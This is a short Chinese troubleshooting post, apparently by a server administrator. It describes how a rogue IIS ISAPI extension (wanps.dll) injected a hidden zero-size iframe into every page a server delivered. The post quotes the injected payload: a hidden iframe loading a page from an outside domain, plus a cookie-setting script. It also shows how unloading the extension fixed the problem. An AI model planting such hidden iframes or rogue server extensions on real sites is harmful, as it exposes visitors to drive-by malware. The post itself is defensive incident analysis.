一台服务器 几乎所有网站打开网页 甚至HTML网页 都出现了
| <iframe src="http://xxxdfsfd/web.htm" height=0 width=0></iframe> |
这种样式的代码 一般在头部 部分杀毒软件打开会报毒
打开HTML或ASP PHP页面 在源码中怎么也找不到这段代码
起初会怀疑是JS 找了半天还是没有发现 连新建的HTML页面 也会有这段代码~
仔细寻找 问题应该在IIS上 打开IIS 重新启动一次 在主IIS上 右键属性 ISAPI 发现一个ISAPI扩展 没见过的
路径为:c:\windows\help\wanps.dll ISAP加载正常 绿色状态
取消 重新启动IIS 所有代码消失
加载项包含了三个文件:
| wanps.ini内容为: Cookie=GAG5=ABCDEFG Redirector=C:\windows\help\wanps.txt wanps.txt内容为: <body> <iframe src="http://web.cn3721.org/web.htm" height=0 width=0></iframe> <script language="javascript"> <!-- var expires = new Date(); expires.setTime(expires.getTime() + 5 * 24* 60 * 60 * 1000); document.cookie="GAG5=ABCDEFG;expires="+expires.toGMTString(); --> </script> </body> |
没有绝对安全的服务器 但是我们可以及时和努力的去修复漏洞。
